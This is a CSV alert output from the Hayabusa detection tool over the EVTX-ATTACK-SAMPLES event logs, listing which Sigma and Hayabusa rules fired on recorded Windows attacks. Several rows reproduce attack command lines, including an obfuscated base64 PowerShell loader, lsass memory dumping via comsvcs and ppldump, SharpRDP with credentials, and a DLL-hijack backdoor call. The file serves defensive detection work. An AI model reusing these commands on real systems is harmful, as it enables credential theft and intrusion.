Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} 
-Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 
C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx -2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx -2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: 
Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2020-01-15 05:44:50.353 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured 
-Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning 
Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from 
Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-03-07 22:17:38.534 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\FullPowersTask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 
wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.046 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 